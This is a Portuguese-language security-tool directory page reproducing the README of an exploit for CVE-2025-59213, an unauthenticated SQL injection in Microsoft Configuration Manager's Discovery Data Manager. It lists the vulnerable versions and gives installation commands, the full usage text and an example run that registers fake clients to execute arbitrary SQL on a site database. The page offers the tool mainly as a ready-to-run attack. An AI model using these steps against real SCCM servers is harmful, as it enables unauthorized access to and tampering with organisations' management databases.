Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-59213 — Exploit de injeção SQL não autenticada para Microsoft Configuration Manager (SCCM) 2503, permitindo execução arbitrária de SQL no banco de dados do site através do método Discovery Data Manager DDM. | Kitploit
Ferramentas/GitHubGitHub/synacktiv/cve-2025-59213
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoSegurança de Banco de Dados
GitHubsynacktiv/cve-2025-59213

CVE-2025-59213

Exploit de injeção SQL não autenticada para Microsoft Configuration Manager (SCCM) 2503, permitindo execução arbitrária de SQL no banco de dados do site através do método Discovery Data Manager DDM.

Ver Repositório
32há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Microsoft Configuration Manager (ConfigMgr / SCCM) 2503: exploração de injeção SQL não autenticada (CVE-2025-59213)

Este script explora a vulnerabilidade CVE-2025-59213, que permite que um atacante não autenticado com acesso de rede a um Management Point execute consultas SQL arbitrárias no banco de dados do site ao abusar de uma falha de injeção SQL no método DuplicateAMTMachineRecord do Discovery Data Manager (DDM), onde o campo Hardware_ID0 sem escape é tratado indevidamente durante a mesclagem de dois clientes com IDs de hardware conflitantes.

Quando o KB34503790 não está instalado, todas as seguintes versões do Microsoft Configuration Manager são vulneráveis:

  • < 2503 (5.00.9135.1008)
  • < 2409 (5.00.9132.1029)
  • < 2403 (5.00.9128.1035)
  • <= 2303 (*)

Requisitos

  • Em alguns casos, quando o management point está configurado com o modo de comunicação HTTPS Only, é necessário um certificado PKI para realizar a autenticação TLS mútua contra o serviço HTTP vulnerável. Qualquer certificado emitido pela PKI interna com a finalidade Client Authentication funcionará.
  • Se você não tiver um certificado, use a opção --altauth ()
mais informações aqui

Notas

  • O exploit exige o registro de dois clientes falsos, que o script exclui automaticamente após uma injeção SQL bem-sucedida, a menos que a opção --no-clean seja usada ou que um patch impeça a execução da limpeza.
  • Como a injeção é assíncrona, payloads baseados em tempo são ineficazes, pois não há correlação direta entre a execução e o tempo de resposta.

Instalação

Você pode instalar clonando o repositório e instalando as dependências.

root@kitploit:~
$ git clone https://github.com/synacktiv/CVE-2025-59213
$ cd CVE-2025-59213
$ python3 -m venv .venv && source .venv/bin/activate
$ python3 -m pip install -r requirements.txt

Uso

root@kitploit:~
 $ python3 CVE-2025-59213.py -h 
usage: CVE-2025-59213.py [-h] -t TARGET [-sk SIGKEY] [-k KEY] [-c CERT] [-v] -cn CLIENT_NAME [-rs REGISTRATION_SLEEP] [-a] -sql SQL [-nc]

CVE-2025-59213 - Discovery Data Manager (DDM) Unauthenticated SQL Injection

options:
  -h, --help            show this help message and exit
  -t, --target TARGET   Target (http://sccm-mp.local/)
  -sk, --sigkey SIGKEY  SMS signature key (automatically generated if omitted)
  -k, --key KEY         Private key file for mTLS
  -c, --cert CERT       Certificate file for mTLS
  -v, --verbose         Verbose output, print requests
  -cn, --client-name CLIENT_NAME
                        Name of the client that will be created in SCCM
  -rs, --registration-sleep REGISTRATION_SLEEP
                        The amount of time, in seconds, that should be waited after registrating a new device (10 seconds by default)
  -a, --altauth         Use the MP's alternate authentication endpoint
  -sql SQL              Query to execute through the SQL injection
  -nc, --no-clean       Do not automatically clean the registred devices

Exemplo

root@kitploit:~
$ python3 ./CVE-2025-59213.py -t https://cmc.corp.local --altauth -cn FAKE_CLIENT_NAME -sql 'select 1'
[+] Generated new signing key, saved to /tmp/sccm_poc.key
[+] CcmMessage : ID={D731ED0A-4474-497D-A191-D8948E17ECBF}
[+] Got SMSID = GUID:CF4AFCD1-7237-4C04-8252-CC0F5B881F3F for new client FAKE_CLIENT_NAME
[+] CcmMessage : ID={23EEE9B8-7971-4560-9D18-9328C5DF0C2E}
[+] Got SMSID = GUID:26A34806-CE06-4212-A830-C1E3AC9D7F69 for new client FAKE_CLIENT_NAME
[+] Sending DDR report: SMSID=GUID:CF4AFCD1-7237-4C04-8252-CC0F5B881F3F OLDSMSID=GUID:26A34806-CE06-4212-A830-C1E3AC9D7F69
[+] CcmMessage : ID={88B6BEBD-1F99-4BD2-8786-6BD3C6CFF299}
[+] CcmMessage : adding clientauth
[+] CcmMessage : adding attachment
[+] DDR report sent successfully
Baixar ferramenta